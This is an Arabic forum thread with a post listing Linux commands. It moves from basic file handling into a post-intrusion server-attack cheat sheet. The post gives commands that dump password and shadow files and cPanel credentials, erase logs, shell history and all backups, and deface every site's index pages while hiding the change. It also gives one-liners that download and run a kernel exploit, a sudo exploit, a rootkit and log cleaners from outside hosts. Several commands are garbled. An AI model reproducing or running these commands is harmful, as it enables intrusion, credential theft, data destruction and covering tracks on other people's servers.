admin Admin
عدد المساهمات : 20 نقاط : 53 السٌّمعَة : 0 تاريخ التسجيل : 19/04/2015 العمر : 33 الموقع/بلد : startup
| موضوع: اوامر kali linux الجمعة أغسطس 07, 2015 5:35 am | |
| اوامر كالي لينكس
cat /etc/passwd | cut -d ":" -f11- أمر إظهار يوزرات المواقع :ls -la /etc/valiasesاوcat /etc/passwdاوls /var/mailاوcat /etc/shadowاوcat /etc/domainaliasln -s / etc/passwd wيسحب لك الملف بملف أسمه wrm angel.php <------لحذف ملفrm -r angel<------ لحذف مجلدfind angel.php <------لعمل بحث عن ملفfind *.php <------لعمل بحث عن جميع الملفات بهذا الامتداد-----------------------------------------أمر التأكد من صلاحية سحب الملفات علي السيرفرwhich xxxx <------ بدل العلامات بأمر السحبxxxx = أمر السحباومر السحبwgetcurl -ogetlynx -source------------------------------------هذا االامر الي معي حلو يخليك ما تمشور مشوار .... هذا يطلعلك الملفات الي داخل مجلد bootتقدر تغيير مجلد boot الى----------------------------------------------كود:cd /boot;ls -aletc << لفحص بعض الملفات ومنها قد تجد ثغرة confixxusr << لمعرفة برامج السيرفرopt < بعض السيرفرات تلقاه بالمجلد الرئيسي بعضها لا--------------------------------------------last -20 -a : عرض آخر 20 اسم تم تسجيل دخولهمps -ax : عرض الـ Processesslsmod : الـ modules الموجوده في الكيرنالuname -a : لعرض معلومات الكرنالاوامر بسيطهmv : تغيير الإسمcp : نسخ ملفcp -R : نسخ مجلدln : إنشاء رابط ( link ) لملفgerp : البحث داخل ملف-----------------------------------لو اردت معرفة هل البورت مفتوح11457 راح اطبق التالي :netstat -an|grep 11457---------------------------------------------امر للتاكد من وجود ملفكود:ls fileحلو بدل ما تكتب ls ويطلع لك ملفات وتخش عيونك على بعضويمكن تستخدمه للتاكد من وجوده ومعرفه التصريحكود:ls -al file------------------------------------------------أوامر إحترافيه :1- إظهار اليوزرات بشكل مرتب :awk -F: '{ print $1 }' / etc/passwd | sort2- معرفة البرامج المستخدمه من قبل اليوزر والرووت ( من ضمنها اسم برنامج الاف تي بي )ps -o "%u : %U : %p : %a"3- معلومات كامله واحترافيه عن ال processess مع تحديد اليوزر المستخدم للبروسيسps -eo pid,tt,user,fname,tmout,f,wchan4- ال processess ليوزر معين ؟ ( استبدل user فقط في هذا الأمر )ps -U user -u user -N5- اليوزرز المتصلين الآنusers6- عرض آخر اليوزرز اللي دخلو :last7- لجلب معلومات عن مستخدم معين ( استبدل user في هذا الأمر )finger user8- امر معرفة اسماء اليوزرز المتصلين بالسيرفر .. وافعالهمw9- عرض البورتات المفتوحهnetstat -lnp --ip-------------------------------------------touch angel.php ينشئ لك ملف ضمن المجلد++g : كومبيلر لل C++ و Cgcc : كومبيلر لل C++ و Cgrep : يستخدم للبحث عن شئ داخل ملفgzip : لضغط ملفاتgunzip : لضغط ملفاتوال un لفك الضغط بالاستعانه مع الاوامر اللي فوق مثال : ungzip unziphaltsys : لاغلاق النظامcat : لعرض محتوى اكثر من ملف مع بعضcd : لتغير الدليل الذي انت عليهchmod : لتغير تصريح دخلول ملف معينchown : لتغير مالك ملف معينclear : لمسح كل الذي على الشاشةcmp : لمقارنة ملفينcp : لنسخ الملفاتcrypt : لتشفير و فك تشفير الملفاتcsplit : لتقسيم الملف الى عدة ملفاتcu : لطلب تريمنال يونكس اخرwhoami يقول لك من انت (يعني من انا ) يقول لك root او مستخدم xxxrm : لمسح ملفات او مجلدات ( خاليه )rmdir : لمسح مجلد ( خالي )وفي حال كنت بالترمنال اضغط على زر التاب Tap يعرض لك كل اوامر اللينكسومثلاً اي امر تحب تعرف شو هووا فقط اكتب الأمر وبعدها هيلب :مثال rm --help--------------------------------------------------أوامر رائعه :لمعرفة جميع ملفات اسم مستخدم معين ( استبدل john )find /home -user johnلمعرفة الملفات اللتي تم تعديلها في خلال الـ 24 ساعه ( أمر مهم )find $HOME -mtime 0لمعرفة المساحه المستخدمهdf -hلمعرفة المساحه المتبقيهdu-----------------------------------------وهذي مجموعة من الأوامر البسيطةls -mيظهر الملفات مع تفريقهم بفواصل بدلا من تفريقهم بخاناتls -tيظهر الملفات حسب تواريخ إنشائها يعني من الجديد إلى القديمls -luيظهر الملفات حسب آخر تاريخ زيارة لهذه الملفات (مع تبيين هذا التاريخ)ls -Fيظهر الملفات بأنواعها حيث :الملفات المسبوقة ب / عبارة عن مجلداتالملفات المسبوقة ب * عبارة عن ملفات تنفيذيةالملفات المسبوقة ب @ عبارة عن روابطls -Sيظهر الملفات تسلسليا من الأكبر إلى الأصغرls -Xيظهر الملفات ويرتبها حسب امتدادهاls -rيظهر الملفات مرتبة بالمقلوب (يعني من z ثم y ثم x ....)cpلنسخ ملف أو مجلدmkdirلإنشاء مجلدmvلتحويل ملف من مجلد إلى مجلد أو إعادة تسميته(مثلاmv angel gnomراح يعيد تسميت المجلد angel إلى gnomأوmv angel.php /ho me/hackteach/publi c_htm l/cc/testراح يحول الملف angel.php من المجلد إلي هو فيه إلى المجلد الجديد test)---------------------------------------ln -sf / home / user / public_html / vb / in clude s / c onfig . php conf.txtراح يجيب لك نسخـة من ملف الكونفق تبع اليوزر المحدد في الملف الجديد conf.txtبالعربي ,, الأمر هذا هو حق السم لينك ,, symLink---------------------------------------أمر لمعرفة اليوزر اللي مستهلك أكبر مساحه :du -s / home | sort -rn( بدون مسافه بعد / و home )-----------------------------------النسخ واللصق بهالطريقةc p /ho me/hi.t xt /ho me/jackأو العكس----------------------------لعمل ماس ديفاس بعد اخذ الروتكود PHP:find / -name "index.*" -exec cp /t mp/index.htm----------------------------------------------أمر إظهار باسوردات السي بانل ( في حالة كنت روت ) :في أوامر كثيره .. بعضها :find / -name service.pwdاوcat / home/*/public_html/_vti_pvt/service.pwdوcat / var/cpanel/accounting.log( لاتنسى تحذف المسافات قبل var و home )--------------------------------------------1- حذف ملفات اللوقوrm -rf / tmp/logsrm -rf $HISTFILErm -rf / root/.ksh_historyrm -rf / root/.bash_historyrm -rf / root/.ksh_historyrm -rf / root/.bash_logoutrm -rf / usr/local/apache/logsrm -rf / usr/local/apache/logrm -rf / var/apache/logsrm -rf / var/apache/logrm -rf / var/run/utmprm -rf / var/logsrm -rf / var/logrm -rf / var/admrm -rf / etc/wtmprm -rf / etc/utmpfind / -name *.bash_history -exec rm -rf {} \;find / -name *.bash_logout -exec rm -rf {} \;find / -name "log*" -exec rm -rf {} \;find / -name *.log -exec rm -rf {} \;-------------------------------------------------2- أمر تعديل ملفات اللوقو ( إخفائها .. آمن )cat / dev/null > / var/log/kdebugcat / dev/null > / var/log/kernelcat / dev/null > / var/log/maillogcat / dev/null > / var/log/messagescat / dev/null > / var/log/securecat / dev/null > / var/log/svclogcat / dev/null > / var/log/tcdebuglogcat / dev/null > / var/log/tclientcat / dev/null > / var/log/tivoLog.prvcat / dev/null > / var/log/tivoLog.pubcat / dev/null > / var/log/tivoweb.logcat / dev/null > / var/log/tvdebuglogcat / dev/null > / var/log/tverrcat / dev/null > / var/log/tvlog3- أمر قرائة ملف الكونفيج على السيرفرcat / usr/local/apache/conf/httpd.conf4- أمر عرض الملفات Suid ( ملفات من قبل الروت لكن يستطيع اليوزر تشغيلها )find / -type f -perm -04000 -ls-------------------------------------------------5- أمر عرض الملفات Sgid ( ملفات من قبل الروت لكن تستطيع المجموعه تشغيلها )find / -type f -perm -02000 -ls6- أوامر عرض المجلدات المصرح لها تصريح 777find / -perm -2 -lsfind / -type d -perm 0777 | xargs ls -alldfind / -type d -pem -2 -ls7- أمر حذف جميع الباك آب الموجوده على السيرفرfind / -name "cpbackup*" -exec rm {} ;find / -name "backup*" -exec rm {} ;8- أمر إستبدال جميع الإندكسات إلى الإندكس الموجود على المسار الحاليfind / -name "index.*" -exec cp index.htm {} ;find / -name "default.*" -exec cp index.htm {} ;9- أمر تعديل صلاحيات الإندكسات إلى nobody ( لكي لا يشك اليوزر )find / -name "index.*" -exec chown 99 index.html {} ;find / -name "default.*" -exec chown 99 index.html {} ;10- أمر عرض System logcat / etc/syslog.conf11- أمر عرض معلومات عن الذاكرهcat / proc/meminfo12- أمر تعديل دوال php والسيف مود وغيرهاpico / usr/local/lib/php.ini13- أمر عرض البورتات المفتوحهnetstat -atup | grep IST14- أمر عرض آخر إتصالlastlog15- أمر عرض اليوزرات المتصلهw--------------------------------------------------16- أمر لمعرفة إصدار الكيرنالdpkg --list | grep linux-imagerpm -q kernel : kernel-2.6.18-53.1.4.el5uname -s : SunOSuname -r : 2.6.22-14-EL5uname -mrsn : Linux s.server.com 2.6.18-53.1.4.el5 x86_64cat / proc/version : Linux version 2.6.18-53.1.4.el5 (b@redhat.com) (gcc version 4.1.2 20070626 (Red Hat 4.1.2-14)) #1 SMP Wed Nov 14 1027 EST 200717- أمر إيقاف process معين عن العملkill -9 PIDkill PIDمع إستبدال PID لرقم البروسيس .. تستطيع معرفته عن طريق الأمرps uxps auxtop18- أمر عرض الأوامر ( او بالأصح الملفات التنفيذيه ) اللتي عليها Suid ( يستطيع اليوزر تشغيلها )find / bin / usr/bin / usr/local/bin / sbin / usr/sbin / usr/local/sbin -perm -4000 2> / dev/null19- أمر عرض اليوزرات اللتي لا تحتوي على باسوردcut -d: -f1,2,3 / etc/passwd | grep---------------------------------------------------------------20- أمر عرض الملفات اللتي تريد الكتابه عليها في مجلد etcfind / etc/ -type f -perm -o+w 2> / dev/null21- أمر عرض أوامر السحب المفعله كـ wgetwhich wget curl w3m lynx22- أمر عرض معلومات عن المعالج CPUINFOcat / proc/version / proc/cpuinfo23- أمر عرض مساحات الهاردسكdu( ملاحظه : تستطيع إستخدامه مع option اخرى .. لاحظ الأوامر التاليه )du -s / home/user | sort -rndf -Th24- أمر التأكد من وجود المترجم gcclocate gcc25- أمر إستخدام Wipelogs ( للتعديل على الوقو .. أمن )wget No Results Found Packet Storm | gcc zap2.c -o zap2 | ./zap226- أمر تنفيذ بعض الهجمات على الكيرنالwget http://ftp.powernet.com.tr/supermail/debug/k3| ./k3 1 | ./k3 2 | ./k3 3 | ./k3 4 | ./k3 527- إستخدام ثغرة stack overflow عن طريق sudowget http://precision-gaming.com/sudo.c | gcc sudo.c -o sudosploit | ./sudosploit28- أمر تثبيت روت كت لإصدار 2.6wget twofaced.org | gcc linux2-6-all.c -o linuxkernel | ./linuxkernel29- أمر استخدام سكربت Mig LogCleanerwget twofaced.org | gcc -DLINUX -WALL mig-logcleaner.c -o migl | ./migl -u root 030- أمر لمعرفة الملفات والمجلدات اللتي تم تعديلها في خلال X يومfind / -mtime x( ملاحظه : استبدل time إلى min للبحث في الدقائق .. ليصلح mmin )31- أمر لمعرفة الملفات والمجلدات اللتي تم تعديل خصائصها ( كـ الملكيه ) في خلال X يومfind / -ctime x32- للبحث عن الملفات اللتي مالكها root لكن يستطيع اليوزر تنفيذهاfind / -perm +4000 -user root33- للبحث عن الملفات اللتي مالكها root لكن يستطيع اليوزر الكتابه عليهاfind / -perm +002 -user root34- للبحث عن الملفات اللتي ليس لديها مالكfind / -nouser35- للبحث عن الملفات اللتي مالكها هو اليوزر rootfind / -user root36- من الأوامر التفصيليه لـ findfind / -name "*.txt" -size +10k -user root -not -perm +o=r -exec chmod o+r {} \;شرح الأمر :ابحث في جميع المجلدات .. عن اي ملف نصي امتداده txtوحجمه أكثر من 10 كيلو بايت .. وصاحبه اليوزر rootوغير قابله للقراءه من اي يوزر اخر ماعدا مالكها الأصلييستطيع صاحبها قرائتها وويستطيع تنفيذها ( execution ) ( ورمزه -r-xr--r-- )----------------------------------------37- وتستطيع إستخدام أمر find بشكل آخر .. مثل : find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls -lg {} \; شرح الأمر : عرض جميع الملفات فقط .. اللتي لديها خاصيتي SetUID و SetGID بشكل مفصلhttp://ftp.powernet.com.tr/supermail/debug/k3
| |
|
¹Đơń't.Płây.Ŵ!th.Me
عدد المساهمات : 11 نقاط : 13 السٌّمعَة : 2 تاريخ التسجيل : 25/08/2015 العمر : 31 الموقع/بلد : العراق
| موضوع: رد: اوامر kali linux الثلاثاء أغسطس 25, 2015 3:29 pm | |
| حً ـلُوْ عِ ـآإشٌتَ آإيْدٍچٍ .~ | |
|